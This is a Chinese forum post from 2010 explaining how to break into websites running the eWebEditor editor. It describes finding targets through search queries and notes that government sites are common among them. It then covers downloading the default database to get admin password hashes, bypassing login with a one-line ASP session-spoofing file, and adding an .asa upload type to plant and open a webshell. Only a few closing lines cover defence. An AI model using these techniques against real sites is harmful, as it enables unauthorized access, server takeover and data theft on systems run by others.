找回密码
 注册
搜索
热搜: 回贴

渗透WebEdit在线编辑器

2010-1-12 20:26| 发布者: admin| 查看: 229| 评论: 0|原作者: 柳梦璃

今天群里一新面孔问WEBEDIT后台如何抓webshell,我叫他百度一下,说这是老东西了应该文章不少.他说没找到叫我告诉他,汗之,简单爬几笔吧-Amxking

通常在GOOGLE或者利用挖掘鸡 搜索关键词 eWebEditor 或/ewebeditor/db/ewebeditor.mdb 就可以找到很多使用eWebEditor的网站,政府站居多~!

第一种利用下载默认数据库获得帐户及密码进后台:

http://www.网站.com/ewebeditor/db/ewebeditor.mdb 默认数据库所在位置

eWebEditor_System

sys_UserName sys_UserPass sys_Version sys_ReleaseDate sys_License

7a57a5a743894a0e 7a57a5a743894a0e 2.8.0 2004-07-06
该表为管理帐户及密码所在表↑

常见默认帐户密码:admin admin (MD5加密后是:7a57a5a743894a0e)

常识:admin 的加密代码:

16位加密:7a57a5a743894a0e

32位加密:21232f297a57a5a743894a0e4a801fc3

admin888的MD5加密码

16位:469e80d32c0559f8

32位加密:7fef6171469e80d32c0559f88b377245

另一种方法是利用WebEditor session欺骗漏洞,进入后台:

漏洞文件:Admin_Private.asp

漏洞语句:<%
If Session("eWebEditor_User") = "" Then

Response.Redirect "admin_login.asp"

Response.End

End If
只判断了session,没有判断cookies和路径的验证问题。

漏洞利用:

新建一个amxking.asp内容如下:

<%Session("eWebEditor_User") = "11111111"%>

访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp

第三种方法就是社会工程学(Social Engineering)猜测帐户及密码了,这里不多说了.

http://www.网站.com/ewebeditor/admin_login.asp 默认后台登陆界面

当我们进入后台后,展开 "样式管理"栏目→新增样式→图片类型中添加asa(即使程序允许上传asa类型文件,这里不要改为asp,因为即使你改为asp,在上传asp类文件时也会被禁止过滤掉,看看其程序你就明白了.)

eWebEditor目录下的Upload.asp文件,有一个极为幼稚的错误,即对于文件过滤只是通过sAllowExt=Replace(UCase(sAllowExt), "ASP", "")来禁止上传asp文件,却未过滤asa、cer等文件,所以给我们创造了机会.

修改完类型后,提交我们建立的新样式.然后预览,上传 马.asa ,copy马的地址,在浏览器里提交浏览即可.

防范入侵: 修改admin_login.asp 后台登陆界面程序名称......

修改默认数据库ewebeditor/db/ewebeditor.mdb地址......

禁止更改添加新样式......


最新评论

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-9-29 13:31 , Processed in 0.207367 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

返回顶部